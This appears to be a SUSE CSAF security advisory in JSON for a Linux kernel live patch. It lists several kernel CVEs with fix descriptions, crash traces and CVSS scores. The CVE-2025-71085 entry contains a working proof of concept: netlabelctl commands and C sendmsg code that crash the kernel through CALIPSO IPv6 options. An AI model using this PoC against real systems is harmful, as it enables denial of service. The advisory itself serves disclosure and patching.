"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1096-1
Vulnerability from csaf_suse - Published: 2026-03-27 04:04 - Updated: 2026-03-27 04:04Summary
Security update for the Linux Kernel (Live Patch 4 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 4 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.16 fixes various security issues
The following security issues were fixed:
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
